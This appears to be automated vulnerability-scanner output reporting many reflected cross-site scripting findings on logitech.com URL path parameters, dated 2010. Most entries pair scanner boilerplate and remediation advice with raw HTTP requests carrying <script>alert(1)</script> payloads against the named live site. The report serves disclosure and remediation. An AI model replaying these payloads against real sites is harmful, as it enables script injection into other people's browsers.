GET /en-us/remotes/universal-remotes43639</script><script>alert(1)</script>06f5bb14f13/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e492"><script>alert(1)</script>128e57bb509 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/remotes/universal-remotes6e492"><script>alert(1)</script>128e57bb509/devices/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8737</script><script>alert(1)</script>4a9b13c6a10 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/universal-remotes/devicesc8737</script><script>alert(1)</script>4a9b13c6a10/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 618da"><script>alert(1)</script>9ebd7180ad2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/remotes/universal-remotes/devices618da"><script>alert(1)</script>9ebd7180ad2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e5d7"><script>alert(1)</script>b7b19606900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us5e5d7"><script>alert(1)</script>b7b19606900/remotes/universal-remotes/devices/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26ff6"%3bc20260948a3 was submitted in the REST URL parameter 1. This input was echoed as 26ff6";c20260948a3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us26ff6"%3bc20260948a3/remotes/universal-remotes/devices/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afc89</script><script>alert(1)</script>e275862a370 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /afc89</script><script>alert(1)</script>e275862a370/remotes/universal-remotes/devices/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 838fd</script><script>alert(1)</script>6095a1aa845 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes838fd</script><script>alert(1)</script>6095a1aa845/universal-remotes/devices/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20c73"><script>alert(1)</script>cc06f181cd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes20c73"><script>alert(1)</script>cc06f181cd4/universal-remotes/devices/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 688a5"><script>alert(1)</script>0a7544f2bed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes/universal-remotes688a5"><script>alert(1)</script>0a7544f2bed/devices/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc701</script><script>alert(1)</script>a637be124e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/universal-remotescc701</script><script>alert(1)</script>a637be124e9/devices/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83bf6"><script>alert(1)</script>4f097867cd0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes/universal-remotes/devices83bf6"><script>alert(1)</script>4f097867cd0/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61c6e</script><script>alert(1)</script>b6caf827857 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/universal-remotes/devices61c6e</script><script>alert(1)</script>b6caf827857/6441 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c894"><script>alert(1)</script>4ae004d0c71 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes/universal-remotes/devices/64417c894"><script>alert(1)</script>4ae004d0c71 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a796</script><script>alert(1)</script>31b7c5cba18 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/universal-remotes/devices/64415a796</script><script>alert(1)</script>31b7c5cba18 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bac5d</script><script>alert(1)</script>dc44d17cb19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bac5d</script><script>alert(1)</script>dc44d17cb19/remotes/universal-remotes/devices/7051 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2a8c"%3b4dfe6e13c75 was submitted in the REST URL parameter 1. This input was echoed as d2a8c";4dfe6e13c75 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usd2a8c"%3b4dfe6e13c75/remotes/universal-remotes/devices/7051 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d789f"><script>alert(1)</script>b432e1484cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usd789f"><script>alert(1)</script>b432e1484cb/remotes/universal-remotes/devices/7051 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b85ea"><script>alert(1)</script>8143bddbf8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotesb85ea"><script>alert(1)</script>8143bddbf8f/universal-remotes/devices/7051 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d27bc</script><script>alert(1)</script>d2859d7ea54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotesd27bc</script><script>alert(1)</script>d2859d7ea54/universal-remotes/devices/7051 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7446</script><script>alert(1)</script>d7eaf165a87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/universal-remotesb7446</script><script>alert(1)</script>d7eaf165a87/devices/7051 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 626e2"><script>alert(1)</script>c4523a99917 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes/universal-remotes626e2"><script>alert(1)</script>c4523a99917/devices/7051 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 717db</script><script>alert(1)</script>cce89e7825f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/universal-remotes/devices717db</script><script>alert(1)</script>cce89e7825f/7051 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b839"><script>alert(1)</script>93817cbe97a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes/universal-remotes/devices6b839"><script>alert(1)</script>93817cbe97a/7051 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb60b"><script>alert(1)</script>27900b4ba6c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotes/universal-remotes/devices/7051cb60b"><script>alert(1)</script>27900b4ba6c HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ee74</script><script>alert(1)</script>779fb2ed4d4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes/universal-remotes/devices/70519ee74</script><script>alert(1)</script>779fb2ed4d4 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9b90"%3b3fb402bcb59 was submitted in the REST URL parameter 1. This input was echoed as e9b90";3fb402bcb59 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afa37"><script>alert(1)</script>305217ddf79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f51d0</script><script>alert(1)</script>f85e48424c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21a78</script><script>alert(1)</script>fe4e047df97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc36"><script>alert(1)</script>741f271979e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddf0b"><script>alert(1)</script>af23944ba8b was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
